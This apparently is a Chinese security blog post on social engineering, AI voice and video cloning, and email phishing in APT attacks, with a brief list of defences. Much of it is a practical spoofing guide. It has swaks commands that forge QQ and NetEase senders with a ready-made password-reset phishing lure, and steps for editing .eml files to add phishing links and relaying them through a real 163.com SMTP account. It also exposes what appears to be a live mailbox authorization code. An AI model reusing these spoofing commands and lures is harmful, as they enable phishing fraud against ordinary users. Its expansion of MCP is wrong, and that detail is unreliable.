网安中社会工程学的解释和初步应用

APT（Advanced Persistent Threat，高级持续性威胁）是一种周期长、隐蔽性极强的攻击模式。攻击者会精心策划，长期潜伏在目标网络中，持续收集目标的业务流程、系统运行状况等核心信息，伺机发动攻击，窃取核心数据。AI 技术降低攻击门槛 → 邮件钓鱼作为 APT 初始入侵入口 → 绕过 SPF/DKIM/DMARC 等防护机制 → 利用 IRT 文案诱导受害者点击/输入 → 实现后

活着就行122

301人浏览 · 2026-01-30 11:50:20

活着就行122 · 2026-01-30 11:50:20 发布

一、社会工程学概述

1.1 广义定义

社会工程学（Social Engineering）于上世纪60年代作为正式学科出现，核心是建立理论体系，并通过利用自然、社会及制度层面的途径，逐步解决各类复杂的社会问题。

1.2 分支学科

公安社会工程学（简称：公安社工学）
网络社会工程学（网安领域重点，核心研究利用人性弱点实现攻击目标）

1.3 核心特点

核心是利用人性弱点（如贪婪、信任、恐惧、紧迫感等），通过虚假手段达成预期目的。

常见应用场景：传销、诈骗、销售、网络钓鱼攻击等，近年来已成为网络安全事件中的主流攻击手段。

二、AI 技术在社会工程学中的应用（新增风险）

AIGC 技术的飞速发展，为社会工程学攻击提供了全新工具，大幅降低了攻击门槛，带来新的安全隐患。

2.1 核心应用工具/技术

声音克隆：可借助豆包、火山引擎、魔搭社区 CosyVoice 等模型实现快速克隆
视频/数字人生成：依托 Deepfake、Confu + LoRA 定制化模型，可生成高度逼真的虚假视频及数字人
智能 Agent：结合 MCP（Multi-Agent Collaboration Protocol，多智能体协作协议），构建自动化社会工程学攻击机器人

2.2 新增风险提示（补漏）

AI 技术使攻击门槛从“需专业技能”降至“几键生成”，常见新型攻击场景：

语音钓鱼：克隆领导、亲人等信任对象的声音，实施诈骗
视频诈骗：伪造视频会议画面、熟人视频，诱导受害者泄露信息
个性化钓鱼：自动生成贴合目标身份的钓鱼内容，提升欺骗成功率

2.3 防御建议

开启多因素验证（MFA），提升账号安全等级
建立安全意识：对不熟悉的来源（语音、视频、链接）保持警惕，不轻信、不盲从
借助反 Deepfake 检测工具，识别虚假音视频内容

三、APT 攻击与邮件钓鱼

3.1 APT 攻击核心定义

APT（Advanced Persistent Threat，高级持续性威胁）是一种周期长、隐蔽性极强的攻击模式。攻击者会精心策划，长期潜伏在目标网络中，持续收集目标的业务流程、系统运行状况等核心信息，伺机发动攻击，窃取核心数据。

3.2 邮件钓鱼在 APT 中的地位

邮件钓鱼是 APT 攻击中最常见、最核心的初始入侵向量之一，通过伪造合法邮件诱导受害者操作，实现第一步渗透。

3.2.1 邮件防护机制基础

（1）SPF 协议（Sender Policy Framework）

核心作用：在发件域名的 DNS 服务器中发布 TXT 记录，明确声明哪些 IP 地址/服务器有权发送该域名的邮件。
验证逻辑：接收邮件的服务器会检查发件 IP 是否在 SPF 记录的授权范围内，以此判断邮件是否为伪造。

查询命令（实操重点）：

查询是否配置SPF：
CMD启动命令行：
nslookup -type=txt qq.com
nslookup -type=txt 163.com
Linux环境下：
dig -t txt qq.com
dig -t txt 163.com

（2）现代邮件防护三剑客（补漏）

DKIM（DomainKeys Identified Mail）：通过数字签名技术，验证邮件内容在传输过程中是否被篡改，确保邮件完整性。
DMARC（Domain-based Message Authentication, Reporting & Conformance）：基于 SPF 和 DKIM 协议的补充策略，明确规定接收服务器如何处理未通过身份验证的邮件（如隔离、拒绝、标记为垃圾邮件）。

（3）无防护场景说明

邮件传输依赖 SMTP 协议，而 SMTP 协议本身不验证发件人身份，若未配置 SPF、DKIM、DMARC 等防护机制，邮件极易被伪造。

3.2.2 无 SPF 时的邮件伪造（目前已罕见）

当目标邮箱未配置 SPF 协议时，可直接使用临时邮箱工具或 Kali 中的 swaks 工具，伪造发件人信息、邮件内容，直接发送至目标邮箱。

3.2.3 有 SPF 时的常见绕过方式（实操重点）

（1）字眼欺骗（Typosquatting / Lookalike）

核心思路：对发件人域名、邮箱地址进行细微调整，使视觉上与真实官方地址高度相似，利用受害者的视觉疏忽实现欺骗。

常见调整方式：

大小写混淆：service → Service
字符替换：com → c0m、o → 0、l → 1
域名后缀篡改：aliyun.com → a1iyun.com
多余后缀添加：网易官方邮箱 mail@service.netease.com → mail@service.netease.com.cn

swaks 命令示例：

swaks --to oitfsomdfq@iubridge.com --from niko@qq.com -ehlo qq.com --body hello -
-header "xiaoolin"
swaks --header-X-Mailer "" --header-Message-Id "" --header-"ContentType"="text/html" --from "QQ管理<admin@qq.com>" --ehlo xiaolin -header "Subject:
测试" --body 我们做了一个测试 --to oitfsomdfq@iubridge.com
--to <收件人邮箱>
--from <要显示的发件人邮箱>
--ehlo <伪造的邮件ehlo头，即发件人邮箱的域名。提供身份认证>
--body <引号中的内容即为邮件正文>
--header <邮件头信息，邮件标题>
市面上大部分常用的邮件服务器都配置了SPF，利用工具或者kali去伪造发送邮件的话，通常情况下就会
被直接拦截或者进了垃圾箱。
这种情况下如何去伪造邮件呢？

swaks --to target@example.com \ --from "网易邮件中心 <mail@service.netease.com.cn>" \ --ehlo qq.com \ --body "您好，您的账号存在安全风险，请点击链接重置密码：xxx" \ --header "Subject: 【紧急】账号安全验证通知"

swaks --to xiaolin65535@foxmail.com --from "网易邮件中心
<mail@service.netease.com.cn>" -ehlo qq.com --body hello --header "xiaolin"

（2）转发突破

核心思路：利用合法邮箱的中转转发功能，使伪造邮件的来源显示为受信任的合法域名，从而绕过 SPF 验证。

具体操作步骤：

注册一个大众常用邮箱（如 163、QQ 邮箱），进入邮箱设置，开启 POP3/IMAP 服务及邮件转发功能，获取第三方登录授权码（注意：授权码≠邮箱登录密码）。
找到目标信任的官方邮件（如网易、QQ 官方通知），将其导出为 .eml 格式文件。
用文本编辑器打开 .eml 文件，修改发件人、邮件标题、正文内容及跳转链接（可添加钓鱼链接），保留原邮件的格式和头部信息，提升真实感。
在 Kali 中调用 swaks 工具，通过已注册的合法邮箱 SMTP 服务器，发送修改后的 .eml 文件：

swaks --to target@foxmail.com \ --from fake@163.com \ --data modified.eml \ --server smtp.163.com \ --port 25 \ --auth-user 你的163邮箱账号@163.com \ --auth-password 你的邮箱授权码


swaks --to xiaolin65535@foxmail.com --from 13687330103@163.com --data 1.eml --
server smtp.163.com -p 25 -au 13687330103@163.com -ap SFIMUWAUIIXCOBWH

--data <将正常源邮件的内容保存成TXT文件，再作为正常邮件发送>
--server <调用163网易邮箱的转发服务>
-p <指定SMTP服务器的端口号>
-au <指定SMTP服务器的URL地址>
-ap <指定用户凭据>

攻击效果：接收方邮箱显示的发件人为伪造的官方地址，邮件下方可能会标注“代发”字样，但极易被安全意识薄弱的受害者忽略，欺骗成功率较高。